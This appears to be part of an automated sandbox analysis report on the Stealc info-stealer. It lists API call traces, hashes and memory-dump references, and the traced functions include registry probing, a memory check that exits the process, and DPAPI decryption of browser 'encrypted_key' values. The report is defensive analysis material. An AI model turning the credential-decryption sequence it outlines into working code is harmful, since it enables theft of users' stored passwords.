                                                                                                                                                                            • Instruction ID: ca347bfbbb7a484c88732f71913c4c749924aeaa86113a474daa7ecc68e3c5c1
                                                                                                                                                                            • Opcode Fuzzy Hash: f3c1c8892f0821982c9e23d570d5c97c3c33c215ed3297f075375657e9b559dd
                                                                                                                                                                            • Instruction Fuzzy Hash: 6101A2B4A58304BFDB00EBE0DE4DF6DB7B8EB48711F104154FA05D7290EA749900DB51
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00787734
                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0078773B
                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,00CF8288,00000000,00020119,007876B9), ref: 0078775B
                                                                                                                                                                            • RegQueryValueExA.KERNEL32(007876B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0078777A
                                                                                                                                                                            • RegCloseKey.ADVAPI32(007876B9), ref: 00787784
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                            • String ID: CurrentBuildNumber
                                                                                                                                                                            • API String ID: 3466090806-1022791448
                                                                                                                                                                            • Opcode ID: 5cd4e3b30f863feee3ba0ba317709338cc48bc7cea9d1202ede05c50aad8501a
                                                                                                                                                                            • Instruction ID: a961f138e8efd7fa2de35f5183dee89a857e0a5b609f81f3ac538b79d980b141
                                                                                                                                                                            • Opcode Fuzzy Hash: 5cd4e3b30f863feee3ba0ba317709338cc48bc7cea9d1202ede05c50aad8501a
                                                                                                                                                                            • Instruction Fuzzy Hash: A50167B5E54308BFDB00DBE0DD49FAEB7B8EB44710F104154FA05A7281DA745500DB91
                                                                                                                                                                            APIs
                                                                                                                                                                            • memset.MSVCRT ref: 007840D5
                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,00D000A0,00000000,00020119,?), ref: 007840F4
                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,00CFFB58,00000000,00000000,00000000,000000FF), ref: 00784118
                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00784122
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00784147
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00CFFC48), ref: 0078415B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: lstrcat$CloseOpenQueryValuememset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2623679115-0
                                                                                                                                                                            • Opcode ID: 2f2075172e1a2a29246b2e1521165a1d7e7a58d3c227642de2c71f4abc96d1ec
                                                                                                                                                                            • Instruction ID: 780c6beba197c5f1e23e687d6b061bdf73121757c9415e3c1a485fb3d8066330
                                                                                                                                                                            • Opcode Fuzzy Hash: 2f2075172e1a2a29246b2e1521165a1d7e7a58d3c227642de2c71f4abc96d1ec
                                                                                                                                                                            • Instruction Fuzzy Hash: BE41BCB6D10108ABDB14FBA4DD4AFFE733DAB48300F408658B61957181EE795B888BD2
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007799EC
                                                                                                                                                                            • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00779A11
                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 00779A31
                                                                                                                                                                            • ReadFile.KERNEL32(000000FF,?,00000000,007802E7,00000000), ref: 00779A5A
                                                                                                                                                                            • LocalFree.KERNEL32(007802E7), ref: 00779A90
                                                                                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 00779A9A
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2311089104-0
                                                                                                                                                                            • Opcode ID: a1a30dafccf18f5ae49b0ffcc27d339c02fbff286614935ba2da57150fefb7e1
                                                                                                                                                                            • Instruction ID: 96925ab3b8414295abee328d7aaf52e97c356ac54fa2768ad8f1c7c18618b28e
                                                                                                                                                                            • Opcode Fuzzy Hash: a1a30dafccf18f5ae49b0ffcc27d339c02fbff286614935ba2da57150fefb7e1
                                                                                                                                                                            • Instruction Fuzzy Hash: 763127B4A02209EFDF14CFA4C989BAE77B5FF48350F10C158E905A7290D778AA41CFA1
                                                                                                                                                                            APIs
                                                                                                                                                                            • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0077123E
                                                                                                                                                                            • __aulldiv.LIBCMT ref: 00771258
                                                                                                                                                                            • __aulldiv.LIBCMT ref: 00771266
                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00771294
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                                                                                                                                                            • String ID: @
                                                                                                                                                                            • API String ID: 3404098578-2766056989
                                                                                                                                                                            • Opcode ID: 88a13258e74346e657fe6f0ccd58b82390508649a4cfa77827977626ce11be1d
                                                                                                                                                                            • Instruction ID: ef005445e71215c90fa7875e660c9c3b6e29a9fca8591cdc3d84492ca14660b5
                                                                                                                                                                            • Opcode Fuzzy Hash: 88a13258e74346e657fe6f0ccd58b82390508649a4cfa77827977626ce11be1d
                                                                                                                                                                            • Instruction Fuzzy Hash: 1E0162B0E44308FADF10EBE4CC49BADB778BB04741F60C144E709B62C1D77859418759
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788
                                                                                                                                                                              • Part of subcall function 007799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007799EC
                                                                                                                                                                              • Part of subcall function 007799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00779A11
                                                                                                                                                                              • Part of subcall function 007799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00779A31
                                                                                                                                                                              • Part of subcall function 007799C0: ReadFile.KERNEL32(000000FF,?,00000000,007802E7,00000000), ref: 00779A5A
                                                                                                                                                                              • Part of subcall function 007799C0: LocalFree.KERNEL32(007802E7), ref: 00779A90
                                                                                                                                                                              • Part of subcall function 007799C0: CloseHandle.KERNEL32(000000FF), ref: 00779A9A
                                                                                                                                                                              • Part of subcall function 00788E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00788E52
                                                                                                                                                                            • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00779D39
                                                                                                                                                                              • Part of subcall function 00779AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nw,00000000,00000000), ref: 00779AEF
                                                                                                                                                                              • Part of subcall function 00779AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00774EEE,00000000,?), ref: 00779B01
                                                                                                                                                                              • Part of subcall function 00779AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nw,00000000,00000000), ref: 00779B2A
                                                                                                                                                                              • Part of subcall function 00779AC0: LocalFree.KERNEL32(?,?,?,?,00774EEE,00000000,?), ref: 00779B3F
                                                                                                                                                                            • memcmp.MSVCRT(?,DPAPI,00000005), ref: 00779D92
                                                                                                                                                                              • Part of subcall function 00779B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00779B84
                                                                                                                                                                              • Part of subcall function 00779B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00779BA3
                                                                                                                                                                              • Part of subcall function 00779B60: memcpy.MSVCRT(?,?,?), ref: 00779BC6
                                                                                                                                                                              • Part of subcall function 00779B60: LocalFree.KERNEL32(?), ref: 00779BD3
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
                                                                                                                                                                            • String ID: $"encrypted_key":"$DPAPI
                                                                                                                                                                            • API String ID: 3731072634-738592651
                                                                                                                                                                            • Opcode ID: 0724081305a2a864f07f796f4b28b6abbb2f4825058518937aed459020658a79
                                                                                                                                                                            • Instruction ID: e8effb8062f65c4bf82796d69fb4e7d13fc4a0b41d1998c9f06cc7f8baa25567
                                                                                                                                                                            • Opcode Fuzzy Hash: 0724081305a2a864f07f796f4b28b6abbb2f4825058518937aed459020658a79
                                                                                                                                                                            • Instruction Fuzzy Hash: BA3163B5E11209EBCF14EFE4DC85AEE77B8BF48344F548519EA05A3241F7389A14CBA1
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00787E37
                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00787E3E
                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,00CF8410,00000000,00020119,?), ref: 00787E5E
                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,00CFFFA0,00000000,00000000,000000FF,000000FF), ref: 00787E7F
                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00787E92
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3466090806-0
                                                                                                                                                                            • Opcode ID: ca439a6df788d93d6cbc76330baf59d5f8e2702d248cee87bdb87416c5e61713
                                                                                                                                                                            • Instruction ID: ed93c448f58fcbc15298c39b52fe3183f7b81ee253719ce64d82a96cbdd7322a
                                                                                                                                                                            • Opcode Fuzzy Hash: ca439a6df788d93d6cbc76330baf59d5f8e2702d248cee87bdb87416c5e61713
                                                                                                                                                                            • Instruction Fuzzy Hash: 921151B1A58205EFD714DF94DD89F7BBBB8EB04710F104259F606A7690D7785800DBA1
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 007712B4
                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 007712BB
                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 007712D7
                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 007712F5
                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 007712FF
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
